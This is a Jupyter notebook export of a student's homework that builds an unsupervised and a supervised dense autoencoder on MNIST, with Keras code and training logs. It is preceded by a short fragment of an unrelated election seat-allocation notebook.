dhont(nSeats,get_escrutinio(todos_geo),verbose=False)
deltas=todos_geo.sample(1)
deltas['d_PODEMOS']=25000
deltas
print(dhont(nSeats,get_escrutinio(todos_geo),verbose=False))
print(dhont(nSeats+1,get_escrutinio(todos_geo),verbose=False))
dhont(nSeats,get_escrutinio(todos_geo,deltas=deltas),verbose=False)
conn.close()
###Output
_____no_output_____ |
homework/Bonus2/Marco Vlajnic_Bonus2_CS583.ipynb | ###Markdown
Bonus2: Build a Supervised Autoencoder. Name: [Marco Vlajnic] PCA and the standard autoencoder are unsupervised dimensionality reduction methods, and their learned features are not discriminative. If you build a classifier upon the low-dimenional features extracted by PCA and autoencoder, you will find the classification accuracy very poor.Linear discriminant analysis (LDA) is a traditionally supervised dimensionality reduction method for learning low-dimensional features which are highly discriminative. Likewise, can we extend autoencoder to supervised leanring? **You are required to build and train a supervised autoencoder look like the following.** You are required to add other layers properly to alleviate overfitting. 0. You will do the following:1. Read and run my code to train a standard dense autoencoder.2. Build and train a supervised autoencoder, visual the low-dim features and the reconstructions, and evaluate whether the learned low-dim features are discriminative. 3. Convert the .IPYNB file to .HTML file. * The HTML file must contain the code and the output after execution. 4. Upload this .HTML file to your Google Drive, Dropbox, or Github repo.4. Submit the link to this .HTML file to Canvas. * Example: https://github.com/wangshusen/CS583-2020S/blob/master/homework/Bonus2/Bonus2.html 1. Data preparation 1.1. Load data
###Code
from keras.datasets import mnist
(x_train, y_train), (x_test, y_test) = mnist.load_data()
x_train = x_train.reshape(60000, 28*28).astype('float32') / 255.
x_test = x_test.reshape(10000, 28*28).astype('float32') / 255.
print('Shape of x_train: ' + str(x_train.shape))
print('Shape of x_test: ' + str(x_test.shape))
print('Shape of y_train: ' + str(y_train.shape))
print('Shape of y_test: ' + str(y_test.shape))
###Output
Shape of x_train: (60000, 784)
Shape of x_test: (10000, 784)
Shape of y_train: (60000,)
Shape of y_test: (10000,)
###Markdown
1.2. One-hot encode the labelsIn the input, a label is a scalar in $\{0, 1, \cdots , 9\}$. One-hot encode transform such a scalar to a $10$-dim vector. E.g., a scalar ```y_train[j]=3``` is transformed to the vector ```y_train_vec[j]=[0, 0, 0, 1, 0, 0, 0, 0, 0, 0]```.1. Define a function ```to_one_hot``` that transforms an $n\times 1$ array to a $n\times 10$ matrix.2. Apply the function to ```y_train``` and ```y_test```.
###Code
import numpy
def to_one_hot(y, num_class=10):
results = numpy.zeros((len(y), num_class))
for i, label in enumerate(y):
results[i, label] = 1.
return results
y_train_vec = to_one_hot(y_train)
y_test_vec = to_one_hot(y_test)
print('Shape of y_train_vec: ' + str(y_train_vec.shape))
print('Shape of y_test_vec: ' + str(y_test_vec.shape))
print(y_train[0])
print(y_train_vec[0])
###Output
Shape of y_train_vec: (60000, 10)
Shape of y_test_vec: (10000, 10)
5
[0. 0. 0. 0. 0. 1. 0. 0. 0. 0.]
###Markdown
1.3. Randomly partition the training set to training and validation setsRandomly partition the 60K training samples to 2 sets:* a training set containing 10K samples;* a validation set containing 50K samples. (You can use only 10K to save time.)
###Code
rand_indices = numpy.random.permutation(60000)
train_indices = rand_indices[0:10000]
valid_indices = rand_indices[10000:20000]
x_val = x_train[valid_indices, :]
y_val = y_train_vec[valid_indices, :]
x_tr = x_train[train_indices, :]
y_tr = y_train_vec[train_indices, :]
print('Shape of x_tr: ' + str(x_tr.shape))
print('Shape of y_tr: ' + str(y_tr.shape))
print('Shape of x_val: ' + str(x_val.shape))
print('Shape of y_val: ' + str(y_val.shape))
###Output
Shape of x_tr: (10000, 784)
Shape of y_tr: (10000, 10)
Shape of x_val: (10000, 784)
Shape of y_val: (10000, 10)
###Markdown
2. Build an unsupervised autoencoder and tune its hyper-parameters1. Build a dense autoencoder model2. Use the validation data to tune the hyper-parameters (e.g., network structure, and optimization algorithm) * Do NOT use test data for hyper-parameter tuning!!! 3. Try to achieve a validation loss as low as possible.4. Evaluate the model on the test set.5. Visualize the low-dim features and reconstructions. 2.1. Build the model
###Code
from keras.layers import Dense, Input
from keras import models
input_img = Input(shape=(784,), name='input_img')
encode1 = Dense(128, activation='relu', name='encode1')(input_img)
encode2 = Dense(32, activation='relu', name='encode2')(encode1)
encode3 = Dense(8, activation='relu', name='encode3')(encode2)
bottleneck = Dense(2, activation='relu', name='bottleneck')(encode3)
decode1 = Dense(8, activation='relu', name='decode1')(bottleneck)
decode2 = Dense(32, activation='relu', name='decode2')(decode1)
decode3 = Dense(128, activation='relu', name='decode3')(decode2)
decode4 = Dense(784, activation='relu', name='decode4')(decode3)
ae = models.Model(input_img, decode4)
ae.summary()
# print the network structure to a PDF file
from IPython.display import SVG
from keras.utils.vis_utils import model_to_dot, plot_model
SVG(model_to_dot(ae, show_shapes=False).create(prog='dot', format='svg'))
plot_model(
model=ae, show_shapes=False,
to_file='unsupervised_ae.pdf'
)
# you can find the file "unsupervised_ae.pdf" in the current directory.
###Output
_____no_output_____
###Markdown
2.2. Train the model and tune the hyper-parameters
###Code
from keras import optimizers
learning_rate = 1E-3 # to be tuned!
ae.compile(loss='mean_squared_error',
optimizer=optimizers.RMSprop(lr=learning_rate))
history = ae.fit(x_tr, x_tr,
batch_size=128,
epochs=100,
validation_data=(x_val, x_val))
import matplotlib.pyplot as plt
%matplotlib inline
loss = history.history['loss']
val_loss = history.history['val_loss']
epochs = range(len(loss))
plt.plot(epochs, loss, 'bo', label='Training Loss')
plt.plot(epochs, val_loss, 'r', label='Validation Loss')
plt.xlabel('Epochs')
plt.ylabel('Loss')
plt.legend()
plt.show()
###Output
_____no_output_____
###Markdown
2.3. Visualize the reconstructed test images
###Code
ae_output = ae.predict(x_test).reshape((10000, 28, 28))
ROW = 5
COLUMN = 4
x = ae_output
fname = 'reconstruct_ae.pdf'
fig, axes = plt.subplots(nrows=ROW, ncols=COLUMN, figsize=(8, 10))
for ax, i in zip(axes.flat, numpy.arange(ROW*COLUMN)):
image = x[i].reshape(28, 28)
ax.imshow(image, cmap='gray')
ax.axis('off')
plt.tight_layout()
plt.savefig(fname)
plt.show()
###Output
_____no_output_____
###Markdown
2.4. Evaluate the model on the test setDo NOT used the test set until now. Make sure that your model parameters and hyper-parameters are independent of the test set.
###Code
loss = ae.evaluate(x_test, x_test)
print('loss = ' + str(loss))
###Output
313/313 [==============================] - 2s 5ms/step - loss: 0.0435
loss = 0.04351149871945381
###Markdown
2.5. Visualize the low-dimensional features
###Code
# build the encoder network
ae_encoder = models.Model(input_img, bottleneck)
ae_encoder.summary()
# extract low-dimensional features from the test data
encoded_test = ae_encoder.predict(x_test)
print('Shape of encoded_test: ' + str(encoded_test.shape))
colors = numpy.array(['r', 'g', 'b', 'm', 'c', 'k', 'y', 'purple', 'darkred', 'navy'])
colors_test = colors[y_test]
import matplotlib.pyplot as plt
%matplotlib inline
fig = plt.figure(figsize=(8, 8))
plt.scatter(encoded_test[:, 0], encoded_test[:, 1], s=10, c=colors_test, edgecolors=colors_test)
plt.axis('off')
plt.tight_layout()
fname = 'ae_code.pdf'
plt.savefig(fname)
###Output
_____no_output_____
###Markdown
Remark:Judging from the visualization, the low-dim features seems not discriminative, as 2D features from different classes are mixed. Let quantatively find out whether they are discriminative. 3. Are the learned low-dim features discriminative?To find the answer, lets train a classifier on the training set (the extracted 2-dim features) and evaluation on the test set.
###Code
# extract the 2D features from the training, validation, and test samples
f_tr = ae_encoder.predict(x_tr)
f_val = ae_encoder.predict(x_val)
f_te = ae_encoder.predict(x_test)
print('Shape of f_tr: ' + str(f_tr.shape))
print('Shape of f_te: ' + str(f_te.shape))
from keras.layers import Dense, Input
from keras import models
input_feat = Input(shape=(2,))
hidden1 = Dense(128, activation='relu')(input_feat)
hidden2 = Dense(128, activation='relu')(hidden1)
output = Dense(10, activation='softmax')(hidden2)
classifier = models.Model(input_feat, output)
classifier.summary()
classifier.compile(loss='categorical_crossentropy',
optimizer=optimizers.RMSprop(lr=1E-4),
metrics=['acc'])
history = classifier.fit(f_tr, y_tr,
batch_size=32,
epochs=100,
validation_data=(f_val, y_val))
###Output
Epoch 1/100
313/313 [==============================] - 3s 8ms/step - loss: 1.9296 - acc: 0.3068 - val_loss: 1.7419 - val_acc: 0.3612
Epoch 2/100
313/313 [==============================] - 2s 7ms/step - loss: 1.6073 - acc: 0.5085 - val_loss: 1.5393 - val_acc: 0.5521
Epoch 3/100
313/313 [==============================] - 2s 7ms/step - loss: 1.4590 - acc: 0.5847 - val_loss: 1.4259 - val_acc: 0.5868
Epoch 4/100
313/313 [==============================] - 2s 7ms/step - loss: 1.3561 - acc: 0.6153 - val_loss: 1.3339 - val_acc: 0.6073
Epoch 5/100
313/313 [==============================] - 2s 7ms/step - loss: 1.2713 - acc: 0.6322 - val_loss: 1.2557 - val_acc: 0.6126
Epoch 6/100
313/313 [==============================] - 2s 7ms/step - loss: 1.2004 - acc: 0.6373 - val_loss: 1.1972 - val_acc: 0.6204
Epoch 7/100
313/313 [==============================] - 2s 7ms/step - loss: 1.1481 - acc: 0.6443 - val_loss: 1.1553 - val_acc: 0.6256
Epoch 8/100
313/313 [==============================] - 2s 8ms/step - loss: 1.1085 - acc: 0.6455 - val_loss: 1.1243 - val_acc: 0.6258
Epoch 9/100
313/313 [==============================] - 2s 7ms/step - loss: 1.0800 - acc: 0.6506 - val_loss: 1.1049 - val_acc: 0.6239
Epoch 10/100
313/313 [==============================] - 2s 7ms/step - loss: 1.0589 - acc: 0.6519 - val_loss: 1.0865 - val_acc: 0.6273
Epoch 11/100
313/313 [==============================] - 2s 7ms/step - loss: 1.0435 - acc: 0.6528 - val_loss: 1.0750 - val_acc: 0.6354
Epoch 12/100
313/313 [==============================] - 2s 7ms/step - loss: 1.0312 - acc: 0.6543 - val_loss: 1.0715 - val_acc: 0.6274
Epoch 13/100
313/313 [==============================] - 2s 7ms/step - loss: 1.0219 - acc: 0.6568 - val_loss: 1.0612 - val_acc: 0.6362
Epoch 14/100
313/313 [==============================] - 2s 7ms/step - loss: 1.0139 - acc: 0.6587 - val_loss: 1.0537 - val_acc: 0.6305
Epoch 15/100
313/313 [==============================] - 2s 7ms/step - loss: 1.0079 - acc: 0.6602 - val_loss: 1.0500 - val_acc: 0.6367
Epoch 16/100
313/313 [==============================] - 2s 7ms/step - loss: 1.0020 - acc: 0.6627 - val_loss: 1.0423 - val_acc: 0.6410
Epoch 17/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9966 - acc: 0.6625 - val_loss: 1.0414 - val_acc: 0.6375
Epoch 18/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9922 - acc: 0.6654 - val_loss: 1.0362 - val_acc: 0.6424
Epoch 19/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9879 - acc: 0.6693 - val_loss: 1.0345 - val_acc: 0.6382
Epoch 20/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9834 - acc: 0.6692 - val_loss: 1.0358 - val_acc: 0.6446
Epoch 21/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9797 - acc: 0.6713 - val_loss: 1.0281 - val_acc: 0.6402
Epoch 22/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9766 - acc: 0.6707 - val_loss: 1.0234 - val_acc: 0.6498
Epoch 23/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9727 - acc: 0.6730 - val_loss: 1.0214 - val_acc: 0.6510
Epoch 24/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9700 - acc: 0.6757 - val_loss: 1.0224 - val_acc: 0.6513
Epoch 25/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9674 - acc: 0.6760 - val_loss: 1.0171 - val_acc: 0.6440
Epoch 26/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9638 - acc: 0.6765 - val_loss: 1.0180 - val_acc: 0.6513
Epoch 27/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9612 - acc: 0.6772 - val_loss: 1.0124 - val_acc: 0.6464
Epoch 28/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9580 - acc: 0.6807 - val_loss: 1.0101 - val_acc: 0.6564
Epoch 29/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9553 - acc: 0.6809 - val_loss: 1.0097 - val_acc: 0.6490
Epoch 30/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9529 - acc: 0.6819 - val_loss: 1.0085 - val_acc: 0.6496
Epoch 31/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9499 - acc: 0.6829 - val_loss: 1.0042 - val_acc: 0.6537
Epoch 32/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9478 - acc: 0.6855 - val_loss: 1.0014 - val_acc: 0.6564
Epoch 33/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9455 - acc: 0.6859 - val_loss: 1.0014 - val_acc: 0.6563
Epoch 34/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9437 - acc: 0.6871 - val_loss: 0.9987 - val_acc: 0.6561
Epoch 35/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9414 - acc: 0.6852 - val_loss: 0.9966 - val_acc: 0.6639
Epoch 36/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9388 - acc: 0.6887 - val_loss: 0.9942 - val_acc: 0.6670
Epoch 37/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9371 - acc: 0.6875 - val_loss: 0.9926 - val_acc: 0.6605
Epoch 38/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9343 - acc: 0.6908 - val_loss: 0.9923 - val_acc: 0.6528
Epoch 39/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9328 - acc: 0.6890 - val_loss: 0.9924 - val_acc: 0.6658
Epoch 40/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9303 - acc: 0.6897 - val_loss: 0.9884 - val_acc: 0.6586
Epoch 41/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9279 - acc: 0.6934 - val_loss: 0.9904 - val_acc: 0.6564
Epoch 42/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9269 - acc: 0.6893 - val_loss: 0.9847 - val_acc: 0.6628
Epoch 43/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9245 - acc: 0.6935 - val_loss: 0.9845 - val_acc: 0.6584
Epoch 44/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9227 - acc: 0.6939 - val_loss: 0.9835 - val_acc: 0.6620
Epoch 45/100
313/313 [==============================] - 2s 6ms/step - loss: 0.9209 - acc: 0.6938 - val_loss: 0.9830 - val_acc: 0.6648
Epoch 46/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9184 - acc: 0.6935 - val_loss: 0.9797 - val_acc: 0.6630
Epoch 47/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9174 - acc: 0.6936 - val_loss: 0.9787 - val_acc: 0.6630
Epoch 48/100
313/313 [==============================] - 3s 8ms/step - loss: 0.9147 - acc: 0.6940 - val_loss: 0.9823 - val_acc: 0.6630
Epoch 49/100
313/313 [==============================] - 2s 8ms/step - loss: 0.9129 - acc: 0.6941 - val_loss: 0.9763 - val_acc: 0.6623
Epoch 50/100
313/313 [==============================] - 2s 5ms/step - loss: 0.9117 - acc: 0.6937 - val_loss: 0.9769 - val_acc: 0.6638
Epoch 51/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9094 - acc: 0.6965 - val_loss: 0.9760 - val_acc: 0.6581
Epoch 52/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9076 - acc: 0.6970 - val_loss: 0.9722 - val_acc: 0.6589
Epoch 53/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9065 - acc: 0.6968 - val_loss: 0.9717 - val_acc: 0.6641
Epoch 54/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9045 - acc: 0.6960 - val_loss: 0.9681 - val_acc: 0.6681
Epoch 55/100
313/313 [==============================] - 2s 7ms/step - loss: 0.9023 - acc: 0.7005 - val_loss: 0.9682 - val_acc: 0.6685
Epoch 56/100
313/313 [==============================] - 2s 8ms/step - loss: 0.8998 - acc: 0.6988 - val_loss: 0.9776 - val_acc: 0.6672
Epoch 57/100
313/313 [==============================] - 3s 10ms/step - loss: 0.8990 - acc: 0.7010 - val_loss: 0.9664 - val_acc: 0.6706
Epoch 58/100
313/313 [==============================] - 2s 5ms/step - loss: 0.8975 - acc: 0.7009 - val_loss: 0.9642 - val_acc: 0.6729
Epoch 59/100
313/313 [==============================] - 1s 4ms/step - loss: 0.8955 - acc: 0.6990 - val_loss: 0.9621 - val_acc: 0.6689
Epoch 60/100
313/313 [==============================] - 1s 3ms/step - loss: 0.8937 - acc: 0.7013 - val_loss: 0.9638 - val_acc: 0.6658
Epoch 61/100
313/313 [==============================] - 1s 4ms/step - loss: 0.8921 - acc: 0.7000 - val_loss: 0.9671 - val_acc: 0.6642
Epoch 62/100
###Markdown
ConclusionUsing the 2D features, the validation accuracy is 60~70%. Recall that using the original data, the accuracy is about 98%. Obviously, the 2D features are not very discriminative.We are going to build a supervised autoencode model for learning low-dimensional discriminative features. 4. Build a supervised autoencoder model**You are required to build and train a supervised autoencoder look like the following.** (Not necessary the same.) You are required to add other layers properly to alleviate overfitting. 4.1. Build the network
###Code
# build the supervised autoencoder network
from keras.layers import Dense, Input
from keras import models, regularizers
input_img = Input(shape=(784,), name='input_img')
# encoder network
encode1 = Dense(128, activation='relu', name='encode1')(input_img)
encode2 = Dense(32, activation='relu', name='encode2')(encode1)
encode3 = Dense(8, activation='relu', name='encode3')(encode2)
# The width of the bottleneck layer must be exactly 2.
bottleneck = Dense(2, activation='relu', name='bottleneck')(encode3)
# decoder network
decode1 = Dense(8, activation='relu', name='decode1')(bottleneck)
decode2 = Dense(32, activation='relu', name='decode2')(decode1)
decode3 = Dense(128, activation='relu', name='decode3')(decode2)
decode4 = Dense(784, activation='relu', name='decode4')(decode3)
# build a classifier upon the bottleneck layer
classifier1 = Dense(512, activation='relu', name='classifier1')(bottleneck)
classifier2 = Dense(32, activation='relu', name='classifier2', kernel_regularizer=regularizers.l2(0.01))(classifier1)
classifier3 = Dense(10, activation='softmax', name='classifier3')(classifier2)
# connect the input and the two outputs
sae = models.Model(input_img, [decode4, classifier3])
sae.summary()
# print the network structure to a PDF file
from IPython.display import SVG
from keras.utils.vis_utils import model_to_dot, plot_model
SVG(model_to_dot(sae, show_shapes=False).create(prog='dot', format='svg'))
plot_model(
model=sae, show_shapes=False,
to_file='supervised_ae.pdf'
)
# you can find the file "supervised_ae.pdf" in the current directory.
###Output
_____no_output_____
###Markdown
4.2. Train the new model and tune the hyper-parametersThe new model has multiple output. Thus we specify **multiple** loss functions and their weights.
###Code
from keras import optimizers
sae.compile(loss=['mean_squared_error', 'categorical_crossentropy'],
loss_weights=[1, 0.5], # to be tuned
optimizer=optimizers.RMSprop(lr=1E-3))
history = sae.fit(x_tr, [x_tr, y_tr],
batch_size=32,
epochs=100,
validation_data=(x_val, [x_val, y_val]))
import matplotlib.pyplot as plt
%matplotlib inline
loss = history.history['loss']
val_loss = history.history['val_loss']
epochs = range(len(loss))
plt.plot(epochs, loss, 'bo', label='Training Loss')
plt.plot(epochs, val_loss, 'r', label='Validation Loss')
plt.xlabel('Epochs')
plt.ylabel('Loss')
plt.legend()
plt.show()
###Output
_____no_output_____
###Markdown
QuestionDo you think overfitting is happening? If yes, what can you do? Please make necessary changes to the supervised autoencoder network structure.**Failing to add proper regularization will lose 1~2 scores.** 4.3. Visualize the reconstructed test images
###Code
sae_output = sae.predict(x_test)[0].reshape((10000, 28, 28))
ROW = 5
COLUMN = 4
x = sae_output
fname = 'reconstruct_sae.pdf'
fig, axes = plt.subplots(nrows=ROW, ncols=COLUMN, figsize=(8, 10))
for ax, i in zip(axes.flat, numpy.arange(ROW*COLUMN)):
image = x[i].reshape(28, 28)
ax.imshow(image, cmap='gray')
ax.axis('off')
plt.tight_layout()
plt.savefig(fname)
plt.show()
###Output
_____no_output_____
###Markdown
4.4. Visualize the low-dimensional features
###Code
# build the encoder model
sae_encoder = models.Model(input_img, bottleneck)
sae_encoder.summary()
# extract test features
encoded_test = sae_encoder.predict(x_test)
print('Shape of encoded_test: ' + str(encoded_test.shape))
colors = numpy.array(['r', 'g', 'b', 'm', 'c', 'k', 'y', 'purple', 'darkred', 'navy'])
colors_test = colors[y_test]
import matplotlib.pyplot as plt
%matplotlib inline
fig = plt.figure(figsize=(8, 8))
plt.scatter(encoded_test[:, 0], encoded_test[:, 1], s=10, c=colors_test, edgecolors=colors_test)
plt.axis('off')
plt.tight_layout()
fname = 'sae_code.pdf'
plt.savefig(fname)
###Output
Shape of encoded_test: (10000, 2)
###Markdown
4.5. Are the learned low-dim features discriminative?To find the answer, lets train a classifier on the training set (the extracted 2-dim features) and evaluation on the validation and test set.
###Code
# extract 2D features from the training, validation, and test samples
f_tr = sae_encoder.predict(x_tr)
f_val = sae_encoder.predict(x_val)
f_te = sae_encoder.predict(x_test)
# build a classifier which takes the 2D features as input
from keras.layers import Dense, Input
from keras import models
input_feat = Input(shape=(2,))
classifier_1 = Dense(32, activation='relu', name='classifier_1')(input_feat)
output = Dense(10, activation='softmax', name='output')(classifier_1)
classifier = models.Model(input_feat, output)
classifier.summary()
classifier.compile(loss='categorical_crossentropy',
optimizer=optimizers.RMSprop(lr=1E-4),
metrics=['acc'])
history = classifier.fit(f_tr, y_tr,
batch_size=32,
epochs=100,
validation_data=(f_val, y_val))
###Output
Epoch 1/100
1/313 [..............................] - ETA: 0s - loss: 6.2960 - acc: 0.0000e+00WARNING:tensorflow:Callbacks method `on_train_batch_end` is slow compared to the batch time (batch time: 0.0000s vs `on_train_batch_end` time: 0.0080s). Check your callbacks.
313/313 [==============================] - 3s 9ms/step - loss: 4.9324 - acc: 0.0546 - val_loss: 2.8143 - val_acc: 0.2450
Epoch 2/100
313/313 [==============================] - 2s 6ms/step - loss: 1.8533 - acc: 0.4355 - val_loss: 1.5142 - val_acc: 0.5391
Epoch 3/100
313/313 [==============================] - 2s 6ms/step - loss: 1.2795 - acc: 0.6780 - val_loss: 1.2720 - val_acc: 0.6539
Epoch 4/100
313/313 [==============================] - 2s 6ms/step - loss: 1.0848 - acc: 0.7154 - val_loss: 1.1569 - val_acc: 0.6491
Epoch 5/100
313/313 [==============================] - 2s 6ms/step - loss: 0.9699 - acc: 0.7357 - val_loss: 1.0771 - val_acc: 0.6965
Epoch 6/100
313/313 [==============================] - 2s 6ms/step - loss: 0.8823 - acc: 0.8011 - val_loss: 1.0158 - val_acc: 0.7719
Epoch 7/100
313/313 [==============================] - 2s 6ms/step - loss: 0.8086 - acc: 0.8672 - val_loss: 0.9620 - val_acc: 0.8268
Epoch 8/100
313/313 [==============================] - 2s 6ms/step - loss: 0.7424 - acc: 0.9232 - val_loss: 0.9141 - val_acc: 0.8751
Epoch 9/100
313/313 [==============================] - 2s 6ms/step - loss: 0.6831 - acc: 0.9656 - val_loss: 0.8738 - val_acc: 0.8982
Epoch 10/100
313/313 [==============================] - 2s 6ms/step - loss: 0.6293 - acc: 0.9766 - val_loss: 0.8386 - val_acc: 0.9041
Epoch 11/100
313/313 [==============================] - 2s 6ms/step - loss: 0.5794 - acc: 0.9797 - val_loss: 0.8034 - val_acc: 0.9075
Epoch 12/100
313/313 [==============================] - 2s 6ms/step - loss: 0.5324 - acc: 0.9828 - val_loss: 0.7735 - val_acc: 0.9088
Epoch 13/100
313/313 [==============================] - 2s 8ms/step - loss: 0.4879 - acc: 0.9836 - val_loss: 0.7455 - val_acc: 0.9090
Epoch 14/100
313/313 [==============================] - 2s 5ms/step - loss: 0.4459 - acc: 0.9844 - val_loss: 0.7191 - val_acc: 0.9102
Epoch 15/100
313/313 [==============================] - 2s 6ms/step - loss: 0.4062 - acc: 0.9838 - val_loss: 0.6961 - val_acc: 0.9095
Epoch 16/100
313/313 [==============================] - 2s 7ms/step - loss: 0.3696 - acc: 0.9843 - val_loss: 0.6740 - val_acc: 0.9094
Epoch 17/100
313/313 [==============================] - 2s 7ms/step - loss: 0.3343 - acc: 0.9842 - val_loss: 0.6547 - val_acc: 0.9091
Epoch 18/100
313/313 [==============================] - 1s 4ms/step - loss: 0.3016 - acc: 0.9848 - val_loss: 0.6377 - val_acc: 0.9092
Epoch 19/100
313/313 [==============================] - 1s 4ms/step - loss: 0.2721 - acc: 0.9853 - val_loss: 0.6252 - val_acc: 0.9097
Epoch 20/100
313/313 [==============================] - 1s 4ms/step - loss: 0.2458 - acc: 0.9850 - val_loss: 0.6161 - val_acc: 0.9092
Epoch 21/100
313/313 [==============================] - 1s 4ms/step - loss: 0.2226 - acc: 0.9849 - val_loss: 0.6089 - val_acc: 0.9105
Epoch 22/100
313/313 [==============================] - 1s 3ms/step - loss: 0.2020 - acc: 0.9850 - val_loss: 0.6055 - val_acc: 0.9108
Epoch 23/100
313/313 [==============================] - 1s 3ms/step - loss: 0.1832 - acc: 0.9854 - val_loss: 0.6028 - val_acc: 0.9113
Epoch 24/100
313/313 [==============================] - 3s 9ms/step - loss: 0.1666 - acc: 0.9862 - val_loss: 0.6024 - val_acc: 0.9122
Epoch 25/100
313/313 [==============================] - 2s 5ms/step - loss: 0.1517 - acc: 0.9875 - val_loss: 0.6049 - val_acc: 0.9128
Epoch 26/100
313/313 [==============================] - 1s 4ms/step - loss: 0.1385 - acc: 0.9881 - val_loss: 0.6089 - val_acc: 0.9133
Epoch 27/100
313/313 [==============================] - 1s 3ms/step - loss: 0.1270 - acc: 0.9888 - val_loss: 0.6136 - val_acc: 0.9133
Epoch 28/100
313/313 [==============================] - 1s 4ms/step - loss: 0.1167 - acc: 0.9893 - val_loss: 0.6197 - val_acc: 0.9146
Epoch 29/100
313/313 [==============================] - 2s 6ms/step - loss: 0.1077 - acc: 0.9892 - val_loss: 0.6258 - val_acc: 0.9153
Epoch 30/100
313/313 [==============================] - 2s 6ms/step - loss: 0.0997 - acc: 0.9899 - val_loss: 0.6329 - val_acc: 0.9156
Epoch 31/100
313/313 [==============================] - 2s 6ms/step - loss: 0.0929 - acc: 0.9902 - val_loss: 0.6401 - val_acc: 0.9166
Epoch 32/100
313/313 [==============================] - 3s 8ms/step - loss: 0.0864 - acc: 0.9913 - val_loss: 0.6486 - val_acc: 0.9169
Epoch 33/100
313/313 [==============================] - 2s 5ms/step - loss: 0.0809 - acc: 0.9919 - val_loss: 0.6566 - val_acc: 0.9172
Epoch 34/100
313/313 [==============================] - 2s 6ms/step - loss: 0.0757 - acc: 0.9922 - val_loss: 0.6668 - val_acc: 0.9172
Epoch 35/100
313/313 [==============================] - 2s 7ms/step - loss: 0.0710 - acc: 0.9926 - val_loss: 0.6758 - val_acc: 0.9178
Epoch 36/100
313/313 [==============================] - 2s 6ms/step - loss: 0.0670 - acc: 0.9925 - val_loss: 0.6857 - val_acc: 0.9179
Epoch 37/100
313/313 [==============================] - 2s 6ms/step - loss: 0.0637 - acc: 0.9930 - val_loss: 0.6949 - val_acc: 0.9187
Epoch 38/100
313/313 [==============================] - 2s 7ms/step - loss: 0.0601 - acc: 0.9925 - val_loss: 0.7059 - val_acc: 0.9181
Epoch 39/100
313/313 [==============================] - 2s 8ms/step - loss: 0.0571 - acc: 0.9930 - val_loss: 0.7145 - val_acc: 0.9192
Epoch 40/100
313/313 [==============================] - 2s 7ms/step - loss: 0.0542 - acc: 0.9936 - val_loss: 0.7255 - val_acc: 0.9188
Epoch 41/100
313/313 [==============================] - 2s 6ms/step - loss: 0.0518 - acc: 0.9936 - val_loss: 0.7360 - val_acc: 0.9186
Epoch 42/100
313/313 [==============================] - 2s 6ms/step - loss: 0.0497 - acc: 0.9936 - val_loss: 0.7452 - val_acc: 0.9192
Epoch 43/100
313/313 [==============================] - 2s 6ms/step - loss: 0.0475 - acc: 0.9938 - val_loss: 0.7540 - val_acc: 0.9199
Epoch 44/100
313/313 [==============================] - 2s 6ms/step - loss: 0.0457 - acc: 0.9937 - val_loss: 0.7636 - val_acc: 0.9192
Epoch 45/100
313/313 [==============================] - 2s 6ms/step - loss: 0.0442 - acc: 0.9937 - val_loss: 0.7750 - val_acc: 0.9197
Epoch 46/100
313/313 [==============================] - 2s 6ms/step - loss: 0.0427 - acc: 0.9940 - val_loss: 0.7840 - val_acc: 0.9198
Epoch 47/100
313/313 [==============================] - 2s 6ms/step - loss: 0.0409 - acc: 0.9941 - val_loss: 0.7935 - val_acc: 0.9206
Epoch 48/100
313/313 [==============================] - 2s 7ms/step - loss: 0.0398 - acc: 0.9942 - val_loss: 0.8033 - val_acc: 0.9203
Epoch 49/100
313/313 [==============================] - 2s 7ms/step - loss: 0.0385 - acc: 0.9942 - val_loss: 0.8118 - val_acc: 0.9209
Epoch 50/100
313/313 [==============================] - 2s 6ms/step - loss: 0.0376 - acc: 0.9944 - val_loss: 0.8218 - val_acc: 0.9202
Epoch 51/100
313/313 [==============================] - 2s 6ms/step - loss: 0.0364 - acc: 0.9940 - val_loss: 0.8298 - val_acc: 0.9213
Epoch 52/100
313/313 [==============================] - 2s 6ms/step - loss: 0.0357 - acc: 0.9944 - val_loss: 0.8394 - val_acc: 0.9210
Epoch 53/100
313/313 [==============================] - 2s 7ms/step - loss: 0.0346 - acc: 0.9945 - val_loss: 0.8473 - val_acc: 0.9211
Epoch 54/100
313/313 [==============================] - 2s 8ms/step - loss: 0.0340 - acc: 0.9947 - val_loss: 0.8574 - val_acc: 0.9217
Epoch 55/100
313/313 [==============================] - 2s 5ms/step - loss: 0.0331 - acc: 0.9947 - val_loss: 0.8662 - val_acc: 0.9218
Epoch 56/100
313/313 [==============================] - 2s 7ms/step - loss: 0.0322 - acc: 0.9955 - val_loss: 0.8756 - val_acc: 0.9213
Epoch 57/100
313/313 [==============================] - 2s 7ms/step - loss: 0.0319 - acc: 0.9948 - val_loss: 0.8822 - val_acc: 0.9219
Epoch 58/100
